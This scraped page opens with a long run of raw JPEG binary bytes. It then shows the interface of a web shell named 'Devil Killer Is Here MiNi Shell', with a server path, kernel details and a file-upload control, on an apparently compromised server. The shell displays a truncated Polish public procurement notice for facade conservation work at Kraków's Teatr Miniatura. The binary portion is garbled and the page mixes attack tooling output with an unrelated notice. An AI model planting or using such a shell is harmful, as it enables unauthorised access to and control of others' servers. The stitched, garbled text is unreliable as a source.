JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210729/0013101101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00131011 z dnia 2021-07-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont konserwatorski elewacji zewnętrznych i wieży <br/>Teatru Miniatura przy pl. Św. Ducha 2 (nr rej. zabytków A-946) – CPV 45453000-7 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Teatr im. Juliusza Słowackiego w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000278818</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Św. Ducha 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-023</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 424 45 23</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 424 45 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wasik@teatrwkrakowie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.teatrwkrakowie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont konserwatorski elewacji zewnętrznych i wieży <br/>Teatru Miniatura przy pl. Św. Ducha 2 (nr rej. zabytków A-946) – CPV 45453000-7 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d856df2b-ef86-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00131011</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004247/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont konserwatorski elewacji zewnętrznych budynku Teatru Miniatura, pl. Św. Ducha 2 w Krakowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://teatrwkrakowie.pl/zamowienia-publiczne-i-ogloszenia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postepowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcy odbywa się przy uzyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochronie<br/>danych osobowych z dnia 27 kwietnia 2016 r. (Dz. Urz. UE L 119 z 04.05.2016) Zamawiający informuje, iż:<br/>1) Administratorem danych osobowych Wykonawcy oraz danych osobowych przekazanych przez<br/>Wykonawcę jest Teatr im. Juliusza Słowackiego w Krakowie, Plac św. Ducha 1, 31-023 Kraków,<br/>2) kontakt z Inspektorem Ochrony Danych -wasyleczko@teatrwkrakowie.pl<br/>3) Dane osobowe przetwarzane będą w celu realizacji umowy - na podstawie Art. 6 ust. 1 lit. b<br/>ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r.<br/>4) odbiorcami danych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na<br/>podstawie przepisów prawa<br/>5) dane osobowe przechowywane będą w oparciu o uzasadniony interes realizowany przez<br/>Administratora<br/>6) Wykonawca oraz osoby, których dane Wykonawca przekazał, posiadają prawo do żądania od<br/>administratora dostępu do danych osobowych, ich sprostowania, usunięcia lub ograniczenia<br/>przetwarzania<br/>7) osoby te mają prawo wniesienia skargi do organu nadzorczego<br/>8) Podanie danych osobowych jest dobrowolne, jednakże odmowa podania danych może skutkować<br/>odmową zawarcia umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAM.282.3.21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia: Remont konserwatorski elewacji zewnętrznych i wieży Teatru Miniatura przy pl. Św. Ducha 2 – CPV 45453000-7, zgodnie z warunkami szczegółowego opisu przedmiotu zamówienia, stanowiącego załącznik nr 1 do SWZ, warunkami SWZ oraz zgodnie z zapisami projektu umowy, stanowiącego załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty ocenione zostaną w oparciu o kryterium – cena 60%, okres gwarancji - 40%<br/><br/>	a) Liczba punktów w kryterium „cena” obliczana będzie według wzoru:<br/> C = ( Cmin / Co ) x 60 pkt, <br/>	gdzie:	C – liczba punktów w kryterium „cena”,<br/> Cmin – najniższa zaoferowana cena spośród wszystkich ocenianych ofert,<br/> Co – cena w ofercie ocenianej.<br/><br/>b) Liczba punktów w kryterium „okres gwarancji” określana będzie według wzoru:<br/> G = ( Go / Gmax ) x 40 pkt, <br/>	gdzie:	G – liczba punktów w kryterium „okres gwarancji”,<br/> Go – okres gwarancji w ofercie ocenianej wskazany w latach ,<br/>Gmax – najdłuższy zaoferowany okres gwarancji spośród wszystkich ofert.<br/><br/>Zamawiający zastrzega, że w przypadku, gdy okres gwarancji ujęty w ofercie przekracza 120 miesięcy, do obliczenia liczby punktów w kryterium przyjmuje się 120 miesięcy.<br/><br/>Łączna liczba punktów, którą otrzyma oferta, stanowi sumę punktów przyznanych w dwóch kryteriach.<br/><br/>Zamawiający udzieli zamówienia Wykonawcy, który uzyska największą całkowitą liczbę punktów<br/><br/>2.	W przypadku złożenia dwóch lub więcej ofert o takiej samej największej liczbie punktów wybrana zostanie oferta, która otrzymała najwyższą ocenę w kryterium „Cena”, a jeżeli oferty otrzymały taką samą ocenę w tym kryterium Zamawiający wezwie Wykonawców, którzy złożyli oferty do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunki udziału w<br/>postępowaniu dotyczące:<br/>1. sytuacji ekonomicznej lub finansowej – Wykonawca spełni warunek jeśli wykaże, że jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 300.000,00 zł.<br/>2. zdolności technicznej lub zawodowej – Wykonawca spełnia warunek jeśli wykaże, że:<br/>- w okresie ostatnich pięciu lat, a gdy okres działalności jest krótszy – w tym okresie, co najmniej<br/>jeden raz wykonywał roboty budowlane polegające na remoncie elewacji obiektu wpisanego do rejestru zabytków o wartości nie niższej niż 300.000,00 zł oraz roboty te wykonał w sposób<br/>należyty,<br/>- dysponuje minimum jedną osobą posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno- budowlanej bez ograniczeń oraz kwalifikacje<br/>określone w art. 37c ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami<br/>(tekst jednolity Dz. U. z 2017 r., poz. 2187 z późn.zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2. Zamawiający przed udzieleniem zamówienia, zgodnie z art. 274 ust. 1<br/>ustawy Prawo zamówień publicznych, wezwie Wykonawcę, którego oferta została najwyżej oceniona<br/>do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, podmiotowych środków dowodowych,<br/>aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:<br/>a) potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia, ze wskazaniem sumy gwarancyjnej<br/>tego ubezpieczenia,<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane – według wzoru<br/>stanowiącego załącznik nr 4 do SWZ,<br/>c) dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty,<br/>d) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego oraz informacją o<br/>podstawie do dysponowania tymi osobami– według wzoru stanowiącego załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2. Zamawiający przed udzieleniem zamówienia, zgodnie z art. 274 ust. 1 ustawy Prawo zamówień<br/>publicznych, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni terminie, podmiotowych środków dowodowych, aktualnych na<br/>dzień złożenia następujących oświadczeń lub dokumentów:<br/>e) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, oraz w celu potwierdzenia, że<br/>osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, sporządzony nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>f) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega<br/>z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie wcześniej niż 3<br/>miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z<br/>zaświadczeniem - dokumenty potwierdzające, że przed upływem terminu składania ofert wykonawca<br/>dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;<br/>g) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający, że wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawiony<br/>nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne - dokumenty potwierdzające, że przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>h) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – na formularzu stanowiącym załącznik nr 6 do SWZ,<br/>i) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy (zgodnie z pkt. VII.1. SWZ), w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez zamawiającego – na formularzu stanowiącym załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	wypełniony formularz oferty (stanowiący załącznik nr 2 do SWZ),<br/>b)	szczegółowy kosztorys ofertowy stanowiący podstawę obliczenia ceny ujętej w formularzu oferty, sporządzony zgodnie z przedmiarem stanowiącym załącznik do SWZ,<br/>c)	dokumenty wymienione w punkcie VII.1. SWZ,<br/>d)	pełnomocnictwo udzielone przez podmioty wspólnie składające ofertę do ich reprezentowania w postępowaniu (jeśli dotyczy),<br/>e)	wskazanie części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w kwocie: 5 000,00 zł.<br/>2. Wadium może być wniesione w jednej lub kilku formach określonych w art. 97 ust. 7 ustawy Prawo zamówień publicznych.<br/>3. Wadium wniesione w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego, to jest rachunek numer 72 1240 2294 1111 0010 1739 4223. W przypadku wnoszenia wadium przelewem uważane jest ono za skutecznie wniesione jeżeli w dniu otwarcia ofert (do godziny otwarcia ofert) wpłata znajduje się na koncie Zamawiającego.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy PZP, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.<br/>6. Zwrot i zatrzymanie wadium następuje na warunkach określonych w art. 98 ustawy Prawo zamówień publicznych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dopuszcza się składanie ofert wspólnych, przy czym oświadczenia o którym mowa w pkt. VII.1. SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, dokumenty określone w punkcie VII.2 e-i winny zostać złożone w odniesieniu do każdego z wykonawców z osobna, natomiast dokumenty określone w punkcie VII.2.a-d w odniesieniu do wszystkich wykonawców działających wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający przewiduje możliwość zmiany umowy co do terminu realizacji prac, o ile zmiana ta jest uzasadniona względami technologicznymi lub innymi czynnikami obiektywnymi, a także co do zmiany zakresu prac oraz odpowiedniej zmiany wynagrodzenia, jeśli zmiana uzasadniona jest względami technologicznymi lub innymi czynnikami obiektywnymi, lub też jest korzystna dla Zamawiającego.<br/>3.	W przypadku wystąpienia okoliczności wskazanych w ust. 2, skutkujących koniecznością zmiany terminu realizacji prac, Zamawiający przewiduje także możliwość zmiany umowy poprzez wprowadzenie podziału realizacji umowy na etapy wraz z możliwością wprowadzenia płatności częściowych.<br/>4.	Zamawiający przewiduje możliwość zmiany umowy w przypadku zmiany ustawowej stawki podatku VAT, obowiązującej dla usług objętych przedmiotem zamówienia, jedynie w zakresie uzasadnionym zmianą stawki tego podatku.<br/>5.	Zmiana umowy nastąpić może również w przypadkach określonych w art. 455 ust. 1 pkt. 2 i następne ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span 